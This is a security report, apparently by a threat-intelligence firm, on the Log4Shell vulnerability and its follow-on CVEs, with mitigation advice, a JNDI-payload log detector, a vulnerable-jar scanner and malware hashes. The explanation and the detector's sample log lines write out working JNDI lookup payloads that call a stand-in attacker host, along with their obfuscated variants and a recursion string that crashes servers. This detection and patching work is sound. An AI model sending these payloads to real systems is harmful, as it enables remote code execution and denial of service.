Friday, May 3, 2024

Special Report – Apache Log4j Vulnerability (CVE-2021-44228)

Verticals Affected: Technology, Gaming, Multiple
Victim Location: Australia, New Zealand, Europe, Latin America, Africa, Asia, North America
Related Malware Families: Muhstik, Mirai, Elknot, Kinsing, M8220, SitesLoader, XMRig, Swrort, Khonsari, Orcus, Tsunami,
Monero, WinGo, Nanocore, PowerShell ReverseShell, TellYouThePass, Dridex, Meterpreter, Wiper-rm, NjRAT, HabitsRAT

What is CVE-2021-44228?

Since early December 2021, the Log4j vulnerability (CVE-2021-44228) has been a hot topic among the threat intelligence and malware research community. The Apache Log4j vulnerability, also known as Log4Shell or LogJam, affects versions 2.0-beta9 through 2.14.1 of Apache Log4j 2, a Java-based logging library bundled in many open source libraries and used in a wide range of popular software. It is rated 10.0 (critical) on the CVSS scale. The root cause is that Log4j's message lookup substitution performed JNDI lookups on attacker-controlled strings that reached a log statement: a string such as ${jndi:ldap://attacker-host/x} in any logged field (a User-Agent header, a username, a chat message) makes the logging library connect to the attacker's server and, depending on the JVM and classpath, load and execute attacker-supplied code. This gives a threat actor remote code execution (RCE) and complete control of the victim system.

CVE-2021-44228 was first reported to the Log4j developers in November 2021 by a researcher on Alibaba Cloud's security team, and a patch was made available shortly thereafter. However, a Twitter user pointed out that the underlying attack vector, JNDI injection, had been presented at Black Hat USA in 2016. The vulnerability was used to target multiple Minecraft related sites and servers. At present, the exploit has spun off at least 60 variants since public disclosure. Industry researchers have observed threat actors using CVE-2021-44228 to install cryptominers and Cobalt Strike beacons. Some newer variants can be exploited over HTTP or HTTPS.

Multiple malware families were observed exploiting CVE-2021-44228, including Muhstik, Mirai, Elknot, Kinsing, M8220, SitesLoader, XMRig, Swrort, Khonsari, Orcus, Tsunami, Monero, WinGo, Nanocore, PowerShell ReverseShell, TellYouThePass, Dofloo, Dridex, Meterpreter, Wiper-rm, and others.

Log4j is used in many external or internet-facing industrial control systems, potentially leaving critical infrastructure exposed to remote exploitation. Due to the multiple layers of dependencies found in enterprise Java environments, some organizations may be unaware they are using Log4j or what version they are using, particularly when using a third party software product leveraging the library. For this reason, there is a high likelihood Log4j will be overlooked and not patched by some end users. Therefore, it is possible this vulnerability will be exploited for years to come.

Related Exploits

Additional exploits related to Log4j were discovered in December. Industry researchers found the fix for CVE-2021-44228 in Log4j 2.15.0 was incomplete in certain non-default configurations. The newly discovered vulnerability, CVE-2021-45046, allows an attacker with control over Thread Context Map input data to craft malicious input using a JNDI Lookup pattern; it was initially rated as a denial of service (DoS) issue. Security firm Praetorian then warned that Log4j 2.15.0, the release that fixed the initial vulnerability, could still be abused to exfiltrate sensitive data, and Apache subsequently raised the CVSS score of CVE-2021-45046 to 9.0 to reflect information leakage and, in some environments, remote code execution. Trend Micro later released information on yet another vulnerability, CVE-2021-45105, which leads to denial of service via uncontrolled recursion in Log4j's StrSubstitutor when a self-referential lookup is evaluated. They stated it is not a variant of CVE-2021-44228 but abuses a similar attack vector. An additional vulnerability, CVE-2021-44832, was discovered in late December. CVE-2021-44832 affects Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4): an attacker who can modify the logging configuration file and who controls the target LDAP server can achieve RCE when the configuration uses a JDBC Appender with a JNDI LDAP data source URI.

A major bug, the recursion issue tracked as CVE-2021-45105, was initially reported in Log4j versions 2.8 through 2.16; Apache's advisory later widened the affected range to 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1). If a string substitution is attempted for any reason on the following string, for example because it was placed in a Thread Context Map value that a pattern layout references, it triggers unbounded recursion and the application crashes with a stack overflow:

${${::-${::-${::-j}}}}

Some threat actors began using novel TTPs when exploiting CVE-2021-44228. Instead of using LDAP callback URLs, some used RMI, or both LDAP and RMI in a single request, to maximize the chance of success. So far, the threat actors observed using this technique were attempting to hijack resources to mine Monero; however, other threat actors could adopt the method. Another security research firm reportedly discovered an alternative attack vector affecting services running on localhost that are not exposed to any network or the internet. It relies on a basic JavaScript WebSocket connection opened by a web page to trigger RCE on servers locally, via drive-by compromise. In other words, anyone running a vulnerable Log4j version behind a listening service on their machine or local network can be exploited by visiting a malicious website, which connects to that service and triggers the vulnerability.
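The payload obfuscation described above (LDAP and RMI callbacks, nested lookups) and the recursion string from the previous section are what a log-based detector has to cope with. The following is an added example written for this report, not code from the original page or from the Log4j project; the access-log lines are constructed samples and 198.51.100.7 is a documentation address standing in for an attacker callback host. It shows why a plain grep for "${jndi:" is not enough, and it bounds its own re-substitution loop, since unbounded re-evaluation of lookup results is exactly the bug class behind CVE-2021-45105.

```python
"""Detection logic for CVE-2021-44228 lookup payloads in web server logs.

Added example; not code from the original report or from the Log4j project.
The log lines below are constructed samples (attacker host 198.51.100.7 is a
documentation address). Attackers hid the literal "${jndi:" behind Log4j's
own lookup syntax (${lower:j}, ${upper:j}, ${env:NOPE:-j}, ${::-j}) and
behind URL encoding; normalize() peels those layers off before matching.
"""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")  # a ${...} with no lookup nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
MAX_PASSES = 20  # bounded on purpose; unbounded recursion is the CVE-2021-45105 bug class

# Constructed sample log lines (Apache combined format, User-Agent field last).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://198.51.100.7:1099/obj}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:06 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.5 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-${::-${::-j}}}}"',
]


def _resolve(m):
    """Evaluate one innermost lookup the way the obfuscated payloads rely on."""
    body = m.group(1)
    kind, _, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if kind == "jndi":
        return m.group(0)            # keep the lookup we want to detect intact
    if ":-" in body:                 # ${unknownKey:-default} evaluates to the default
        return body.split(":-", 1)[1]
    return m.group(0)                # anything else: leave untouched


def normalize(text):
    """Resolve obfuscation lookups, innermost first, for at most MAX_PASSES rounds."""
    for _ in range(MAX_PASSES):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def lookup_depth(text):
    """Maximum nesting depth of ${...} lookups; deep nesting is itself a signal."""
    depth = best = 0
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            best = max(best, depth)
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
        i += 1
    return best


def analyze(line):
    """Return detection results for one log line."""
    decoded = unquote(unquote(line))        # strip up to two layers of URL encoding
    normalized = normalize(decoded)
    hit = JNDI.search(normalized)
    return {
        "naive_hit": "${jndi:" in line.lower(),  # what a plain grep would see
        "jndi": hit is not None,
        "scheme": hit.group(1).lower() if hit else None,
        "depth": lookup_depth(decoded),
        "normalized": normalized,
    }


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = analyze(line)
        if r["jndi"]:
            verdict = "JNDI via " + r["scheme"]
        elif r["depth"] >= 3:
            verdict = "nested lookups"
        else:
            verdict = "clean"
        tail = r["normalized"][-60:]
        print(f"{verdict:18} naive_grep={str(r['naive_hit']):5} depth={r['depth']}  {tail}")
```

Run as a script it prints one verdict per sample line. The naive grep matches only the first plain payload; after normalization the lower/upper, default-value and URL-encoded variants all resolve to a ${jndi:ldap:...} or ${jndi:rmi:...} lookup, and the CVE-2021-45105 recursion string is not a JNDI payload but stands out by its nesting depth of 4.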

A worm leveraging CVE-2021-44228, a self-propagating Mirai bot targeting Linux systems, emerged but proved to be ineffective for large scale attacks.

In early January, the threat actor group responsible for Night Sky ransomware began exploiting CVE-2021-44228 to access internet-exposed VMware Horizon systems and infect them with ransomware. PolySwarm has samples from this new campaign. Hashes are available at the end of this report.

Impact

With CVE-2021-44228 affecting a wide range of software applications used by multiple verticals worldwide, this critical-severity vulnerability may be used to create chaos. So far, the US has added CVE-2021-44228 to CISA's Known Exploited Vulnerabilities catalog, and Canada has taken Canada Revenue Agency systems offline as a precaution. Britain's National Cyber Security Centre, the Australian Cyber Security Centre, CERT-NZ, Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI), and CERT-FR have also issued advisories related to CVE-2021-44228.

Google reportedly found at least 35,863 Java packages on Maven Central depending on a vulnerable version of Log4j. Companies and products known to be affected by CVE-2021-44228 included Apple, Tencent, Twitter, Baidu, Steam, Minecraft, Cloudflare, Amazon, Tesla, Palo Alto Networks, IBM, Pulse Secure, Ghidra, Elasticsearch, Apache, Google, Webex, LinkedIn, Cisco, and VMware.

Industry reporting indicates state sponsored APT groups, including Hafnium, Stone Panda (APT10), Aquatic Panda, Nemesis Kitten, Charming Kitten (APT35), Venomous Bear (Turla), Fancy Bear (APT28), and unnamed North Korean and Turkish threat actors may be leveraging CVE-2021-44228. Financially motivated Eastern European groups, including the Conti ransomware group, are also reportedly leveraging CVE-2021-44228.

While many organizations have become victims of the Log4j vulnerability, only some have publicly acknowledged the intrusions:

  • Unknown threat actors reportedly attacked the web server of the highest German tax court, the Federal Finance Court (BFH), using the Log4j vulnerability. The website was temporarily taken offline as a precaution. A spokesperson stated the threat actors did not gain access to sensitive data.
  • The Belgian defense ministry announced it was the victim of an attack carried out via the Log4Shell vulnerability.
  • Chinese nexus threat actor group Aquatic Panda reportedly targeted an unnamed academic institution using the vulnerability.
  • Vietnamese cryptocurrency platform ONUS was targeted in early January 2022, with user data from 2 million users compromised.
  • Industry reporting indicates unnamed threat actor groups have leveraged CVE-2021-44228 to steal money from bank accounts.

Mitigation

We published a mitigation strategy for Log4j in December last year. In addition, the following measures can help protect your organization against malware leveraging CVE-2021-44228:

  • If your organization uses the Log4j library, upgrade to Log4j 2.17.1 or later. 2.17.0 closes CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105; 2.17.1 also closes CVE-2021-44832. For applications that must stay on Java 7 or Java 6, the equivalent security releases are 2.12.4 and 2.3.2.
  • Where an upgrade is not immediately possible, remove the JndiLookup class from the log4j-core jar, which is Apache's recommended interim mitigation. Setting the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable is not sufficient, as it does not cover CVE-2021-45046.
  • Update any affected third party applications to a patched version when available, and inventory third party software for bundled copies of log4j-core, since vendors often ship it inside WAR files or shaded jars rather than as a visible dependency.
  • A blue team cheat sheet of vendor responses to CVE-2021-44228, posted by user SwitHak, is available on GitHub for reference.
  • CISA has created an Apache Log4j Vulnerability Guidance page.
  • Use the hashes available below for detection of malware families known to exploit CVE-2021-44228.
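The inventory step above is where most organizations struggle, because log4j-core is frequently buried inside a WAR or a fat jar. The following scanner is an added example written for this report, not code from the original page or from the Log4j project. It walks a directory tree, opens every archive (recursing into archives nested inside archives), reads the version from log4j-core's pom.properties, checks whether JndiLookup.class is still present, and classifies each copy against the fully fixed release for its branch (2.17.1, 2.12.4 or 2.3.2); anything below that is reported as vulnerable. demo() writes a few constructed sample jars (a pom.properties and a stub class entry, not real Log4j bytecode) into a temporary directory so the example runs offline; in practice, point scan_tree() at /opt, a Tomcat webapps directory, or a mounted container image.

```python
"""Find log4j-core jars on disk, including copies nested inside WAR/EAR/fat jars.

Added example; not code from the original report or from the Log4j project.
The sample jars built by demo() are constructed stand-ins, not real Log4j.
"""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")

# Releases that close all four CVEs, per Apache's advisory: 2.17.1 on the
# main line, 2.12.4 for the Java 7 branch, 2.3.2 for the Java 6 branch.
FIXED_BY_BRANCH = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_MAIN = (2, 17, 1)


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (pre-release tag dropped)."""
    nums = [int(x) for x in re.findall(r"\d+", version.split("-", 1)[0])]
    return tuple((nums + [0, 0, 0])[:3])


def classify(version, has_jndi_class):
    """Status of one log4j-core copy given its version and whether JndiLookup is present."""
    if version is None:
        return "unknown version" + (", JndiLookup.class present" if has_jndi_class else "")
    v = parse_version(version)
    if v < (2, 0, 0):
        return "log4j 1.x (not affected by CVE-2021-44228)"
    if v >= FIXED_BY_BRANCH.get(v[:2], FIXED_MAIN):
        return "patched"
    if not has_jndi_class:
        return "mitigated (JndiLookup.class removed; upgrade still required)"
    return "VULNERABLE"


def inspect_archive(zf, path, findings):
    """Record log4j-core evidence in an open archive, then recurse into nested archives."""
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else None
        findings.append({"path": path, "version": version,
                         "status": classify(version, JNDI_CLASS in names)})
    for name in names:
        if name.lower().endswith(ARCHIVES):  # e.g. WEB-INF/lib/*.jar inside a WAR
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, path + "!/" + name, findings)


def scan_tree(root):
    """Walk a directory tree and return one finding per log4j-core copy found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVES):
                full = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def sample_jar_bytes(version, include_jndi=True, nested=None):
    """Constructed stand-in for a log4j-core jar (sample data, not real Log4j)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        for name, data in (nested or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo():
    """Build constructed samples in a temp dir, scan it, return {relative path: (version, status)}."""
    samples = {
        "app/lib/log4j-core-2.14.1.jar": sample_jar_bytes("2.14.1"),
        "app/lib/log4j-core-2.17.1.jar": sample_jar_bytes("2.17.1"),
        "app/lib/log4j-core-2.12.4.jar": sample_jar_bytes("2.12.4"),
        "app/lib/log4j-core-2.10.0.jar": sample_jar_bytes("2.10.0", include_jndi=False),
        # a WAR with no log4j of its own, but a vulnerable copy in WEB-INF/lib
        "app/webapp.war": sample_jar_bytes(None, include_jndi=False,
            nested={"WEB-INF/lib/log4j-core-2.13.3.jar": sample_jar_bytes("2.13.3")}),
    }
    results = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app", "lib"))
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        for f in scan_tree(root):
            outer, _, inner = f["path"].partition("!/")
            key = os.path.relpath(outer, root).replace(os.sep, "/")
            results[key + ("!/" + inner if inner else "")] = (f["version"], f["status"])
    return results


if __name__ == "__main__":
    for path, (version, status) in sorted(demo().items()):
        print(f"{status:60} {version or '?':8} {path}")
```

The "!/" separator in a reported path marks a copy found inside another archive, which is the case the third bullet above warns about. A stripped jar (JndiLookup.class absent) is reported as mitigated rather than patched, because removing the class only addresses the JNDI lookup CVEs and the version still needs to be upgraded.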

Malware Leveraging CVE-2021-44228 – IOCs

PolySwarm is currently tracking all new samples of malware exploiting CVE-2021-44228 and extracting host behavior, command and control network channels, and other relevant IOCs. This information is available in our datasets for enrichment purposes. Some of the samples we have include the following:

Khonsari
f2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789

Monero
c56860f50a23082849b6f06fb769f02d2a90753aa8e9397015d8df991c961644
7e81fc39bcc8e92a4f0c1296d38df6a10353bbe479e11e2a99a256f670aae392

WinGo
0229935d0e5be4cc737d5ce7085efe95d857419b77a3d2405f5ee44334a80ad5
cd9077bf07eb4183aa5d7093cd32c9fddc43e2ecba91a682d666b041c39a4cd2
d63ca1f88d5ae76ad6685bab53594a2b2f396f8d4bfd2adde8cb6563d2fc6d29

TellYouThePass
1b671c42ed304dc34ba41ac9f7666a251336455894350af40f402c30afd497df
460b096aaf535b0b8f0224da0f04c7f7997c62bf715839a8012c1e1154a38984
4d15aa5d68b0e8b081c18d0ee5c06cc1758d17246a8d01b3c8ac48d1ef07610b
5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e
6ce1bebcd641892898e3a5c14931b1c85dea779578b9c6b752c0b002c6ea3791

PowerShell ReverseShell
82444084da0460b71a625154ca0bc815d7920137bbdb3463ee174b8efb234637
be52669997419cd52e42262e5b9049cafe3fe591c8ff2d1b2380e5835b666c63

NanoCore
bd5006ba4e4cfcf8a8b0b6da5bb30f4dd8a78beb351b814431ae8599dcf23f1b
e39fd26159d0e2b336bd97a204be39ace844ea5b770b0ada6c50dcd8666caa18

Mirai worm - Linux
e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273

Monero Ocean Miner/XMRig
a04a0cac9e896d12c2c50754f9a27d6127d1b7ebaafb04d45582621b6f91cc57

Dridex
ee14add8eb5342d6c672dbff573b0737ac4f718f06d2881f9d319e6c806db770
794c18c4e796a1395683efeac67e4fcdaf03f26cc3ff4d42e541277b08a537cb
3e79102274c5d3a079fb0a70e2dfb616196ec82125e62b38c3f071bd431526f0
07d2c7e6ad2f889fc3ab3313b01f2c4fdb698a273309d9674a539bb49e935096

OrcusRAT
295aa53d4f104ee8532593b17eaf6b31b8c065de922e4507879cecb13f0d3504
86fc70d24f79a34c46ef66112ef4756639fcad2f2d7288e0eeb0448ffab90428

M8220
10fad59b071db09aafcb7f40e775f28180aed182786557e9ee7f2f2e332b4513

Meterpreter
07d2c7e6ad2f889fc3ab3313b01f2c4fdb698a273309d9674a539bb49e935096

Wiper-rm
41e7cee6b5534a0e8633be51f8a3bb37d439f0ccd8893ed67dcbe6be7dda2e48

Kinsing
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Charming Kitten (APT from Iran)
bdf347ce89860bdde9e0b4eba3673fbcb0c5a521e4887b620106dc73650358da
1223c3ed0c877c49f032a47c62ca63a9599ab21952ce19c9e9a892cc6a8a5531
1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e
2bc46b0362fa7f8f658ce472958a70385b772ab9361625edc0a730211629a3c4
38fb99ff637003fdcde7b26c40750757e4499ec106c3bab12aa528bc2a67a8f5
43ad88aeed362ea9a84b936e6aa58b75ab3a55ee968f7afce7010003317a340a
8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9
ac2235137a347e373db62c083b90106164554178c354364bde2f89178dc11ac4
d3aa8d62d7d5ed924eafb9fbfac39eafdb62ce7d804cc62385622faddf72a5fd

Elknot
90ee1a8e8f0ea5085b83b8efe174674a93260b599729bf53e1b140e2acc7d26f

SitesLoader
e7c5b3de93a3184dc99c98c7f45e6ff5f6881b15d4a56c144e2e53e96dcc0e82
f059246cea87a886acb1938809cf4a1152247a5b5a2df0b1bf64c46a0daccbcc

Night Sky Ransomware
8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0
a077a55608ced7cea2bd92e2ce7e43bf51076304990ec7bb40c2b384ce2e5283
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577

source: https://polyswarm.network/
